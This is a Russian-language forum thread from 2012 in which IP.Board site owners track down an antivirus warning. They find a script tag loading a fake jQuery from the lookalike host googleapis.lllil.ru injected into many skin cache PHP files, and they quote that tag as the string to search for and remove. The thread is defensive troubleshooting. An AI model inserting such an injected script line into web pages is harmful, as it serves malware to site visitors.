Перейти к содержимому


Фотография
- - - - -

Троян на форуме


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 18

#11 Оффлайн   Sirius

    Пользователь


  • Пользователи
  • Репутация
    -4
    • Cообщений: 44
    • Форум:3.3.х

Отправлено 27 Декабрь 2012 - 00:40

зашел, норм , антитвирус не ругаеться


  • 0

#12 Оффлайн   Law AC vs. Finch

    Гуру


  • Пользователи
  • Репутация
    889
    • Cообщений: 3 004
    • Форум:Нет

Отправлено 27 Декабрь 2012 - 16:28

У меня нет таких папок.

И не будет. А вообще Вы откуда взяли/подключили этого зверя? В скрипте jquery даже и не пахнет. 


  • 0

#13 Оффлайн   flays

    Новичок


  • Пользователи
  • Репутация
    1
    • Cообщений: 14
    • Форум:3.3.х

Отправлено 27 Декабрь 2012 - 20:52

У меня нет таких папок.

И не будет. А вообще Вы откуда взяли/подключили этого зверя? В скрипте jquery даже и не пахнет. 

Говорю ж, ничего не делал с форумом больше месяца. У многих аваст ругается на эту хрень. Откуда он взялся хз. Хостер сказал что: 

 

Да, файл 

Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытое содержание

действиельно заражен. Но это не файл Вашего сайта, а часть какого-то подключаемого модуля, информацию подгружается с сайта lllil.ru. Видимо, стоит отключить подгружаемую оттуда информацию.

Где и как искать? Пытался тотал командером найти, нод блокирует файлы которые он загружает в тмп на комп. 


  • 0

#14 Оффлайн   psqwer

    Новичок


  • Пользователи
  • Репутация
    2
    • Cообщений: 3
    • Форум:3.3.х

Отправлено 28 Декабрь 2012 - 01:23

Абсолютно тоже самое происходит на форуме что и у ТС со вчерашнего дня

ставил релиз ipbzona.ru 3.3.3

Ругаются каспер аваст и нод

перерыл весь интернет решения не нашел

 

пробовал заменить jquery.min.js лежит он тут

\admin\js\3rd_party\

оригинальным из дистрибутива - не помогло .... :prostite:

 

на сайте googleapis.lllil.ru

голый апач где видать лежит гадость

 

проверил все файлы форума поиском там есть много упоминаний googleapis.lllil.ru

в основном в папки кэша

в оригинальном дистрибутиве этого нет ... то есть он дописался в

\cache\skin_cache\cacheid_1\skin_global.php

\cache\skin_cache\cacheid_1\skin_global_other.php

....

\cache\skin_cache\cacheid_4\skin_register.php

 

всего дописана строка

<script type=\"text/javascript\" src=\"http://googleapis.lllil.ru/ajax/libs/jquery/1.8.3/jquery.min.js\"></script></head>

в 21 файле

конечно я удалю эти записи но не факт что они снова не появятся

если появятся отпишусь


кто нибудь может сказать как удалить/обновить весь кэш форума?


Сообщение отредактировал psqwer: 28 Декабрь 2012 - 01:39

  • 1

#15 Оффлайн   psqwer

    Новичок


  • Пользователи
  • Репутация
    2
    • Cообщений: 3
    • Форум:3.3.х

Отправлено 28 Декабрь 2012 - 02:04

всмысле простая замена папки кэш на форуме оригинальной из дистрибутива не помогает - форум в виде белой страницы


  • 0

#16 Оффлайн   flays

    Новичок


  • Пользователи
  • Репутация
    1
    • Cообщений: 14
    • Форум:3.3.х

Отправлено 28 Декабрь 2012 - 15:24

всмысле простая замена папки кэш на форуме оригинальной из дистрибутива не помогает - форум в виде белой страницы

Можете подсказать в каких файлах эта хрень живет? А то я не могу поиском пройтись, нод все блокирует. Хоть бери его и удаляй. Так же отпишитесь после удаления как работает сайт? 


  • 0

#17 Оффлайн   ๖ۣۣۜDesperate™

    Администратор


  • Администраторы
  • Репутация
    4 632
    • Cообщений: 8 603
    • Форум:3.4.х
    • Город:IpbZona
    Участник

Отправлено 28 Декабрь 2012 - 16:01

в оригинальном дистрибутиве этого нет ... то есть он дописался в
\cache\skin_cache\cacheid_1\skin_global.php
\cache\skin_cache\cacheid_1\skin_global_other.php

....

\cache\skin_cache\cacheid_4\skin_register.php

 

В дистрибутив мы точно ссылки такие не пихаем. Как вариант это происходит из за того что эти дистрибутивы не пропатчены. БЫл же бум по шеллам и всяким кодам. Что самое интересное люди не успевали ставить форум, а уже шеллы валялись у них. Как многие гуру говорили, настроено автоматически.


  • 0

#18 Оффлайн   psqwer

    Новичок


  • Пользователи
  • Репутация
    2
    • Cообщений: 3
    • Форум:3.3.х

Отправлено 28 Декабрь 2012 - 18:23

В дистрибутив мы точно ссылки такие не пихаем. Как вариант это происходит из за того что эти дистрибутивы не пропатчены. БЫл же бум по шеллам и всяким кодам. Что самое интересное люди не успевали ставить форум, а уже шеллы валялись у них. Как многие гуру говорили, настроено автоматически.
да, я и говорю что в вашем дистрибутиве этих ссылок нет
вы то тут не причем

зараза прописывается в кэш стилей (причем всех которых когда либо устанавливали на сайт)
если конкретней то в
\cache\skin_cache\cacheid_1\
\cache\skin_cache\cacheid_2\
\cache\skin_cache\cacheid_3\
и тд

в каких конкретно файлах теперь уже не скажу тк вычистил все, часть из них написана выше
просто скачайте вышеуказанные папки к себе на комп и пройдитесь поиском по php файлам в них
искать "googleapis.lllil.ru" и удалите строку
<script type=\"text/javascript\" src=\"http://googleapis.lllil.ru/ajax/libs/jquery/1.8.3/jquery.min.js\"></script>

второй день пошел после удаления - все чисто полет нормальный

и все таки никто не написал как правильно удалить/очистить кэш стилей форума (((

Сообщение отредактировал psqwer: 28 Декабрь 2012 - 18:27

  • 1

#19 Оффлайн   flays

    Новичок


  • Пользователи
  • Репутация
    1
    • Cообщений: 14
    • Форум:3.3.х

Отправлено 28 Декабрь 2012 - 22:58

39 файлов было с этой строчкой... в папке кеш. Удалил все, вроде перестал ругаться нод. Спасибо за помощь. 


  • 1